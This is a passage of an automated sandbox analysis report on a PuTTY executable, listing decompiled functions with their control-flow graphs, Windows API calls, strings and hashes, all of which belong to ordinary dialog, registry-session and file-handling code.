2757->2763 2758->2731 2762->2725 2768 43cdc4-43cdf4 call 43a3ef call 43a517 call 40b470 * 2 call 43a587 2763->2768 2769 43cd98-43cdad GetDlgItem 2763->2769 2771 43ca61-43ca98 LoadIconA SendMessageA GetDesktopWindow GetWindowRect 2764->2771 2765->2771 2772 43ca5a-43ca5b DestroyWindow 2765->2772 2766->2758 2773 43c9ac-43c9c2 call 43c7d5 2766->2773 2768->2757 2775 43cdb6-43cdc2 2769->2775 2776 43cdaf-43cdb0 DestroyWindow 2769->2776 2780 43cae4-43cbee MapDialogRect CreateWindowExA SendMessageA * 2 MapDialogRect CreateWindowExA SendMessageA * 2 call 44ce90 2771->2780 2781 43ca9a-43caa5 GetWindowRect 2771->2781 2772->2771 2773->2758 2775->2768 2775->2769 2776->2775 2789 43cca1-43ccb6 SendMessageA 2780->2789 2790 43cbf4-43cc04 2780->2790 2781->2780 2785 43caa7-43cade MoveWindow 2781->2785 2785->2780 2795 43ccbe-43ccc8 call 43a587 2789->2795 2792 43cc0a-43cc0d 2790->2792 2793 43cc8e-43cc9b 2790->2793 2796 43cc22 2792->2796 2797 43cc0f-43cc20 call 407941 2792->2797 2793->2789 2793->2790 2807 43ccca 2795->2807 2808 43ccb8-43ccba 2795->2808 2801 43cc25-43cc2c 2796->2801 2797->2801 2801->2793 2805 43cc2e-43cc3a call 40792a 2801->2805 2817 43cc53-43cc63 call 44e4d0 2805->2817 2818 43cc3c-43cc50 call 44c558 2805->2818 2809 43ccda-43cce7 SetWindowLongA 2807->2809 2812 43cccc-43ccd9 call 43b605 2808->2812 2813 43ccbc-43ccbd 2808->2813 2809->2725 2812->2809 2813->2795 2823 43cc65-43cc6a 2817->2823 2824 43cc6c 2817->2824 2818->2817 2825 43cc6d-43cc78 call 43c7f9 2823->2825 2824->2825 2827 43cc7d-43cc81 2825->2827 2828 43cc83 2827->2828 2829 43cc86-43cc8b 2827->2829 2828->2829 2829->2793
                            APIs
                            • GetWindowLongA.USER32(?,000000EB), ref: 0043C976
                              • Part of subcall function 0043BA8E: RegisterClipboardFormatA.USER32(commctrl_DragListMsg), ref: 0043BAA7
                            • GetCapture.USER32 ref: 0043C9A1
                            • ReleaseCapture.USER32 ref: 0043C9CD
                            • SetWindowTextA.USER32(?), ref: 0043CA17
                            • SetWindowLongA.USER32(?,000000EB,00000000), ref: 0043CA29
                            • GetWindowLongA.USER32(?,000000EC), ref: 0043CA37
                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0043CA46
                            • GetDlgItem.USER32(?,000003ED), ref: 0043CA50
                            • DestroyWindow.USER32(00000000), ref: 0043CA5B
                            • LoadIconA.USER32(000000C9), ref: 0043CA6C
                            • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0043CA81
                            • GetDesktopWindow.USER32 ref: 0043CA83
                            • GetWindowRect.USER32(00000000,?), ref: 0043CA94
                            • GetWindowRect.USER32(?,?), ref: 0043CAA1
                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0043CADE
                            • MapDialogRect.USER32(?,?), ref: 0043CB02
                            • CreateWindowExA.USER32(00000000,STATIC,Cate&gory:,50000000,?,?,?,?,00000062,000003EF,00000000), ref: 0043CB3B
                            • SendMessageA.USER32(00000062,00000031,00000000,00000000), ref: 0043CB4B
                            • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0043CB55
                            • MapDialogRect.USER32(00000062,?), ref: 0043CB76
                            • CreateWindowExA.USER32(00000200,SysTreeView32,00457667,50010037,?,b,?,b,00000062,000003F0,00000000), ref: 0043CBB3
                            • SendMessageA.USER32(00000062,00000031,00000000,00000000), ref: 0043CBC2
                            • SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 0043CBCA
                            • _strrchr.LIBCMT ref: 0043CC5A
                            • SendMessageA.USER32(00000000,0000110B,00000009,?), ref: 0043CCAC
                            • GetDlgItem.USER32(FFFFFE6E,?), ref: 0043CDA5
                            • DestroyWindow.USER32(00000000), ref: 0043CDB0
                            • SetWindowLongA.USER32(00000062,000000EB,00000001), ref: 0043CCE1
                              • Part of subcall function 0043C7D5: SetWindowLongA.USER32(?,00000022,?), ref: 0043C7E6
                              • Part of subcall function 0043C7D5: SetWindowLongA.USER32(00000001,0000001E,00000001), ref: 0043C7F0
                            • MessageBeep.USER32(00000000), ref: 0043CD0B
                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0043CD44
                            • SendMessageA.USER32(FFFFFE6E,0000000B,00000000,00000000), ref: 0043CD50
                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0043CD7B
                            • SendMessageA.USER32(FFFFFE6E,0000000B,00000001,00000000), ref: 0043CE20
                            • InvalidateRect.USER32(FFFFFE6E,00000000,00000001), ref: 0043CE28
                            • SetFocus.USER32(?), ref: 0043CE33
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Message$Send$Long$Rect$CaptureCreateDestroyDialogItem$BeepClipboardDesktopFocusFormatIconInvalidateLoadMoveRegisterReleaseText_strrchr
                            • String ID: b$b$..\windows\windlg.c$@$@KG$@KG$Cate&gory:$STATIC$SysTreeView32$b$gvE$j == ctrl_path_elements(s->pathname) - 1
                            • API String ID: 763474852-138607456
                            • Opcode ID: 820ded45f15959f7dfa44e4dd375cef2a82d75433f1b31406ec618b974cdb8b1
                            • Instruction ID: 6546697fb9cfe94d6f70a5b1d0082ce098c52ff46f55735f238f881ff9a157d6
                            • Opcode Fuzzy Hash: 820ded45f15959f7dfa44e4dd375cef2a82d75433f1b31406ec618b974cdb8b1
                            • Instruction Fuzzy Hash: 60F19A72900209AFDF11DFA4DC85EAE7BB9FF08315F10502AF904B62A1C775AE90DB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043C6EB Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 85windowregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2902 43c6eb-43c76c LoadCursorA RegisterClassA CreateDialogParamA SetWindowLongA * 2 2903 43c79e-43c7ac KiUserCallbackDispatcher 2902->2903 2904 43c76e-43c77e GetWindowLongA 2903->2904 2905 43c7ae-43c7b1 2903->2905 2908 43c780-43c78d IsDialogMessageA 2904->2908 2909 43c799-43c79c 2904->2909 2906 43c7b3-43c7b6 PostQuitMessage 2905->2906 2907 43c7bc-43c7d4 GetWindowLongA DestroyWindow 2905->2907 2906->2907 2908->2909 2910 43c78f-43c793 DispatchMessageA 2908->2910 2909->2903 2909->2905 2910->2909
                            APIs
                            • LoadCursorA.USER32(00000000,00007F00), ref: 0043C71D
                            • RegisterClassA.USER32(00002808), ref: 0043C73B
                            • CreateDialogParamA.USER32(?,?,?,?,00000000), ref: 0043C74C
                            • SetWindowLongA.USER32(00000000,0000001E,00000000), ref: 0043C75E
                            • SetWindowLongA.USER32(00000000,00000022,00000000), ref: 0043C764
                            • GetWindowLongA.USER32(00000000,0000001E), ref: 0043C771
                            • IsDialogMessageA.USER32(00000000,?,?,?,?,?,00000000), ref: 0043C785
                            • DispatchMessageA.USER32(?), ref: 0043C793
                            • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0043C7A5
                            • PostQuitMessage.USER32(?), ref: 0043C7B6
                            • GetWindowLongA.USER32(00000000,00000022), ref: 0043C7BF
                            • DestroyWindow.USER32(00000000,?,?,?,?,00000000), ref: 0043C7C8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Long$Message$Dialog$CallbackClassCreateCursorDestroyDispatchDispatcherLoadParamPostQuitRegisterUser
                            • String ID: &
                            • API String ID: 2918427034-1010288
                            • Opcode ID: e4d4b93dcd1250c409b3c6526e17ced969770ada7862e5a76529edbb13cada17
                            • Instruction ID: 3f3c69005660f4a2abe60eedff5340df5d298dce835a1d90e2f137e8f8bc3de0
                            • Opcode Fuzzy Hash: e4d4b93dcd1250c409b3c6526e17ced969770ada7862e5a76529edbb13cada17
                            • Instruction Fuzzy Hash: B33118B1904318ABDB109FA5ED889DEBFBCEF08762F105026F905E2252D7749940DFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043A59A Relevance: 20.0, APIs: 1, Strings: 10, Instructions: 701windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2911 43a59a-43a5b6 2912 43a601-43a605 2911->2912 2913 43a5b8-43a5bb 2911->2913 2914 43a607-43a60b 2912->2914 2915 43a656-43a676 2912->2915 2913->2912 2916 43a5bd-43a5fe call 40b3b0 call 44ce90 call 43a4ba call 439202 2913->2916 2914->2915 2919 43a60d-43a64a call 40b3b0 call 40b625 call 44ce90 call 43a4ba call 439775 2914->2919 2917 43addb-43ade0 2915->2917 2918 43a67c-43a690 2915->2918 2916->2912 2925 43ade2-43ade8 2917->2925 2926 43adff-43ae12 2917->2926 2921 43a7b6-43a7b9 2918->2921 2922 43a696-43a6ad 2918->2922 3021 43a64f-43a653 2919->3021 2933 43a831-43a884 2921->2933 2934 43a7bb-43a7c0 2921->2934 2928 43a6c6-43a6c8 2922->2928 2929 43a6af-43a6c3 call 44c558 2922->2929 2927 43adee-43adf2 2925->2927 2930 43ae22-43ae23 2926->2930 2931 43ae14-43ae17 2926->2931 2936 43adf6-43adfa 2927->2936 2937 43adf4 2927->2937 2941 43a777-43a77f 2928->2941 2942 43a6ce-43a6d7 2928->2942 2929->2928 2931->2930 2943 43ae19-43ae1c call 439239 2931->2943 2939 43a886-43a88d 2933->2939 2940 43a89f-43a8a3 2933->2940 2945 43a7c2-43a7d6 call 44c558 2934->2945 2946 43a7d9-43a7e2 2934->2946 2936->2927 2950 43adfc 2936->2950 2937->2936 2952 43a88f-43a894 2939->2952 2957 43a8a5-43a8ab 2940->2957 2958 43a8e8-43a907 call 44ce90 2940->2958 2948 43a781-43a787 2941->2948 2949 43a796-43a7b1 2941->2949 2953 43a6f0-43a6f2 2942->2953 2954 43a6d9-43a6ed call 44c558 2942->2954 2975 43ae21 2943->2975 2945->2946 2960 43a7e4-43a7eb 2946->2960 2961 43a7f8-43a80c call 44c558 2946->2961 2973 43a788-43a78c 2948->2973 2974 43adc9-43add5 2949->2974 2950->2926 2964 43a896 2952->2964 2965 43a899-43a89d 2952->2965 2967 43a711-43a716 2953->2967 2968 43a6f4-43a6fd 2953->2968 2954->2953 2969 43a8c7-43a8e5 2957->2969 2970 43a8ad-43a8c4 call 44c558 2957->2970 2994 43ad2a-43ad41 call 44c558 2958->2994 2995 43a90d 2958->2995 2978 43a7f3-43a7f6 2960->2978 2979 43a7ed-43a7f1 2960->2979 2980 43a80f-43a82c 2961->2980 2964->2965 2965->2940 2965->2952 2967->2974 2985 43a71c-43a72b 2967->2985 2983 43a6fe-43a70f 2968->2983 2969->2958 2970->2969 2988 43a790-43a794 2973->2988 2989 43a78e 2973->2989 2974->2917 2974->2918 2975->2930 2978->2961 2978->2980 2979->2960 2979->2978 2980->2958 2983->2967 2983->2983 2992 43a72e-43a770 2985->2992 2988->2949 2988->2973 2989->2988 2992->2992 2997 43a772 2992->2997 3015 43ad44-43ad48 2994->3015 2998 43a960-43a984 call 43a32e 2995->2998 2999 43aad5-43aafd call 43a32e call 439515 2995->2999 3000 43a914-43a95b call 43956b call 43a32e call 43971c call 40b470 * 2 2995->3000 3001 43a9e9-43aa23 call 43a32e call 40b3b0 2995->3001 3002 43ab48-43ab6d call 43a32e 2995->3002 3003 43aaff-43ab1a call 43a32e 2995->3003 2997->2974 3022 43a986-43a993 2998->3022 3023 43a9ab-43a9af 2998->3023 3057 43ab3a-43ab43 call 40b470 2999->3057 3000->3015 3058 43aa25-43aa2a 3001->3058 3059 43aa88-43aa99 call 4393e2 3001->3059 3031 43ab6f-43abaa call 40b3b0 call 439dc8 3002->3031 3032 43abac-43abb4 3002->3032 3027 43ab23-43ab35 call 43987a 3003->3027 3028 43ab1c 3003->3028 3029 43ad4a-43ad8f call 40b3b0 call 44c930 call 43a4ba call 43a3a0 3015->3029 3030 43ad99-43ada1 call 40b470 3015->3030 3021->2915 3035 43a9a0-43a9a4 call 4392a5 3022->3035 3036 43a995-43a99e call 439349 3022->3036 3039 43a9c3-43a9cc 3023->3039 3040 43a9b1-43a9c1 call 439aae 3023->3040 3027->3057 3028->3027 3069 43ada2-43ada7 3029->3069 3118 43ad91-43ad97 3029->3118 3030->3069 3083 43abf4-43abf9 3031->3083 3037 43abe1-43abec call 439c11 3032->3037 3038 43abb6-43abbc 3032->3038 3065 43a9a9 3035->3065 3077 43a9e3-43a9e4 3036->3077 3070 43abf1 3037->3070 3050 43abcf-43abdf call 4399f1 3038->3050 3051 43abbe-43abcd call 439b6b 3038->3051 3055 43a9d3-43a9dd 3039->3055 3056 43a9ce 3039->3056 3079 43a9e0 3040->3079 3050->3083 3051->3083 3055->3079 3056->3055 3057->3015 3071 43aa32 3058->3071 3072 43aa2c-43aa30 3058->3072 3078 43aa9e-43aaa9 3059->3078 3065->3079 3069->2974 3081 43ada9-43adb0 3069->3081 3070->3083 3084 43aa34-43aa53 call 43a32e 3071->3084 3072->3084 3093 43ac79-43ac7f call 40b470 3077->3093 3088 43aaab-43aab8 call 40b470 3078->3088 3089 43aaba-43aad0 call 40b470 * 2 3078->3089 3079->3077 3081->2974 3090 43adb2-43adbc 3081->3090 3091 43ac76 3083->3091 3092 43abfb-43ac1e call 40b3b0 3083->3092 3109 43aa82-43aa86 3084->3109 3110 43aa55-43aa59 3084->3110 3088->3089 3089->3015 3099 43adbe-43adc7 3090->3099 3091->3093 3114 43ac51-43ac75 SendDlgItemMessageA call 40b470 3092->3114 3115 43ac20 3092->3115 3093->3015 3099->2974 3099->3099 3109->3058 3109->3059 3116 43aa72-43aa7e 3110->3116 3117 43aa5b-43aa6f call 44c558 3110->3117 3114->3091 3120 43ac25-43ac4f 3115->3120 3116->3109 3117->3116 3118->3069 3120->3114 3124 43ac22 3120->3124 3124->3120
                            APIs
                              • Part of subcall function 0043A32E: _strlen.LIBCMT ref: 0043A33E
                            • SendDlgItemMessageA.USER32(00000001,00000002,00000192,?,?), ref: 0043AC67
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend_strlen
                            • String ID: !"Can't happen"$!ctrl->generic.tabdelay$(ctrl->columns.ncols == 1) ^ (ncols == 1)$..\windows\winctrls.c$d$i < ntabdelays$ncols <= lenof(columns)$nshortcuts < MAX_SHORTCUTS_PER_CTRL$ntabdelays < lenof(tabdelays)$u
                            • API String ID: 599799640-2119785801
                            • Opcode ID: cf94a692f30318953ec5ca5bc6d92a6bfcbfa8ee4e960a172c51a99662847605
                            • Instruction ID: 68557a700a779c4e139e4a2efa4221357b1149a47b4f1e86fa866a7b332f015e
                            • Opcode Fuzzy Hash: cf94a692f30318953ec5ca5bc6d92a6bfcbfa8ee4e960a172c51a99662847605
                            • Instruction Fuzzy Hash: F542A071940209DFCF14DF55C881AEEBBB5FF4C304F24506AE845AB242D778AD51CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044974C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 52registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3126 44974c-449757 3127 44975e 3126->3127 3128 449759-44975c 3126->3128 3129 449763-44979b call 44c220 call 40b3b0 call 44957a RegOpenKeyA 3127->3129 3128->3127 3128->3129 3136 4497a3-4497af RegOpenKeyA 3129->3136 3137 44979d-4497a1 3129->3137 3139 4497b5-4497b8 RegCloseKey 3136->3139 3140 4497b1 3136->3140 3138 4497be-4497cb call 40b470 3137->3138 3139->3138 3140->3139
                            APIs
                            • _strlen.LIBCMT ref: 00449766
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449797
                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 004497AB
                            • RegCloseKey.ADVAPI32(?,?,-load,?,00410E80,?,?,00401130,?,?), ref: 004497B8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Open$Close_strlen
                            • String ID: -load$Default Settings$Software\SimonTatham\PuTTY\Sessions
                            • API String ID: 3264041530-171475511
                            • Opcode ID: 3a430bd73f6866366c2838ff0bfdc6dd6aee4be4951cf86d17448beb6fcdc48b
                            • Instruction ID: 32ebc23046e39b9210a98a3181ac8289d3da65599d3d2aaa667d1261dfd274ad
                            • Opcode Fuzzy Hash: 3a430bd73f6866366c2838ff0bfdc6dd6aee4be4951cf86d17448beb6fcdc48b
                            • Instruction Fuzzy Hash: F501D232904118FBEB119E51DC05FAB3BA8DF40764F24002BF804A6191DB79DE4197AC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00454336 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3143 454336-45434f 3144 454351-454358 3143->3144 3145 45435a-454361 3143->3145 3146 454365-45436c 3144->3146 3145->3146 3147 45437f-454388 3146->3147 3148 45436e-454371 3146->3148 3151 4543a2 3147->3151 3152 45438a-45438b 3147->3152 3149 454373-454379 3148->3149 3150 45437b 3148->3150 3149->3147 3149->3150 3150->3147 3155 4543a9-4543af 3151->3155 3153 45438d-45438e 3152->3153 3154 454399-4543a0 3152->3154 3156 4543c0-4543d3 3153->3156 3157 454390-454397 3153->3157 3154->3155 3158 4543b1-4543b4 3155->3158 3159 4543ef 3155->3159 3162 4545b7-4545ba 3156->3162 3157->3155 3160 4543e6-4543ed 3158->3160 3161 4543b6-4543b9 3158->3161 3163 4543f2-454408 3159->3163 3160->3163 3164 4543dd-4543e4 3161->3164 3165 4543bb-4543be 3161->3165 3166 454439-45443e 3163->3166 3167 45440a 3163->3167 3164->3163 3165->3156 3170 4543d8-4543db 3165->3170 3168 454440-454445 3166->3168 3169 45446c 3166->3169 3171 454434-454437 3167->3171 3172 45440c-45440e 3167->3172 3175 454447-454449 3168->3175 3176 454463-45446a 3168->3176 3174 454473-45447d 3169->3174 3170->3163 3171->3174 3172->3171 3173 454410-454412 3172->3173 3177 454414-454419 3173->3177 3178 45442b-454432 3173->3178 3180 454491-454493 3174->3180 3181 45447f-45448c 3174->3181 3175->3169 3179 45444b-45445e 3175->3179 3176->3174 3177->3176 3184 45441b-454420 3177->3184 3178->3174 3185 4545b6 3179->3185 3182 454495-4544a6 3180->3182 3183 4544ac-4544af 3180->3183 3181->3180 3186 45448e-454490 3181->3186 3182->3183 3187 4544a8 3182->3187 3188 4544b1 3183->3188 3189 4544b3-4544b5 3183->3189 3184->3179 3190 454422-454429 3184->3190 3185->3162 3186->3180 3187->3183 3188->3189 3191 4544b7-4544bd 3189->3191 3192 4544bf-4544c1 3189->3192 3190->3174 3193 4544c9-4544d5 call 45416c 3191->3193 3192->3193 3194 4544c3 3192->3194 3197 4544d7-4544de 3193->3197 3198 4544ef-45450c CreateFileA 3193->3198 3194->3193 3199 4544e8-4544ea 3197->3199 3200 454520-45452d GetLastError call 45410d 3198->3200 3201 45450e-454517 GetFileType 3198->3201 3199->3185 3200->3199 3203 45452f-454532 3201->3203 3204 454519-45451a CloseHandle 3201->3204 3206 454534-454538 3203->3206 3207 45453a-45453d 3203->3207 3204->3200 3208 454543-454572 call 454209 3206->3208 3207->3208 3209 45453f 3207->3209 3212 454574-454576 3208->3212 3213 45459f-4545a3 3208->3213 3209->3208 3212->3213 3216 454578-45457c 3212->3216 3214 4545a5-4545a9 3213->3214 3215 4545b4 3213->3215 3214->3215 3217 4545ab-4545b1 3214->3217 3215->3185 3216->3213 3218 45457e-454591 call 4553c1 3216->3218 3217->3215 3221 454593-45459d 3218->3221 3222 4545bb-4545d0 call 45368f 3218->3222 3221->3213 3223 4545fa-454600 call 44f301 3221->3223 3228 4545d2-4545d6 3222->3228 3229 4545e8-4545f8 call 4553c1 3222->3229 3228->3229 3230 4545d8-4545e6 call 456543 3228->3230 3229->3213 3229->3223 3230->3223 3230->3229
                            APIs
                            • CreateFileA.KERNELBASE(0043D0FD,80000000,0043D0FD,0000000C,00000001,00000080,00000000,00000001,00000000,00000000), ref: 00454502
                            • GetFileType.KERNEL32(00000000), ref: 0045450F
                            • CloseHandle.KERNEL32(00000000), ref: 0045451A
                            • GetLastError.KERNEL32 ref: 00454520
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: File$CloseCreateErrorHandleLastType
                            • String ID: H
                            • API String ID: 1809617866-2852464175
                            • Opcode ID: f6fbdc22a15bc53fe651ca245ef2a47340ef33d25cbf79b7f9888e42b25adec5
                            • Instruction ID: dcaf63e6907ea8ad0c05b088ec068c673a000e1b5cf58ee3ac1fd38cf579951f
                            • Opcode Fuzzy Hash: f6fbdc22a15bc53fe651ca245ef2a47340ef33d25cbf79b7f9888e42b25adec5
                            • Instruction Fuzzy Hash: EE812870948249A7EF208F94C8447AE7B60AB8231EF14416BED55AF2D3E37D49CDC74A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00439176 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3265 439176-439194 MapDialogRect 3266 439196-4391d8 CreateWindowExA SendMessageA call 44c4d0 3265->3266 3267 4391fa 3265->3267 3270 4391dd-4391e1 3266->3270 3269 4391fc-439201 3267->3269 3270->3269 3271 4391e3-4391f8 SetWindowPos 3270->3271 3271->3269
                            APIs
                            • MapDialogRect.USER32(?,?), ref: 0043918A
                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 004391BA
                            • SendMessageA.USER32(00000000,00000030,?,00000001), ref: 004391CA
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000116), ref: 004391F2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$CreateDialogMessageRectSend
                            • String ID: LISTBOX
                            • API String ID: 4261271132-1812161947
                            • Opcode ID: ac71a082251d14c553236cfbe2663334f61479f406ee6b00492b2e489fba775a
                            • Instruction ID: f51a0f5dc01ea03eb82e640ee32b55d0696c559b639a2e676fad2eb7104b5740
                            • Opcode Fuzzy Hash: ac71a082251d14c553236cfbe2663334f61479f406ee6b00492b2e489fba775a
                            • Instruction Fuzzy Hash: 42112732100209BFEF125F94EC05EEA3BBAEF49761F004025FE05A1161D676E821EB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040B66B Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3272 40b66b 3273 40b66e-40b67e call 44c220 3272->3273 3276 40b680-40b684 call 40b3b0 3273->3276 3278 40b689-40b6a5 call 44def0 call 44c220 3276->3278 3283 40b6c5-40b6cb 3278->3283 3284 40b6a7 3278->3284 3285 40b6aa-40b6c3 call 44def0 call 44c220 3284->3285 3285->3283
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID:
                            • API String ID: 1497175149-0
                            • Opcode ID: eacbb008b8f62cbea0c162e66a38db9337e9aca4d20afcadbcda4783ecc9b35f
                            • Instruction ID: f207afea09e08fedd646cc0d30e97ecacfcb7db66eadf47c3c69a9b09e99e2e1
                            • Opcode Fuzzy Hash: eacbb008b8f62cbea0c162e66a38db9337e9aca4d20afcadbcda4783ecc9b35f
                            • Instruction Fuzzy Hash: FDF09677E0121537E71065A96C81B5F6389EF50318B19043AFD08E7302F6BED91041DD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00410CE3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 134COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
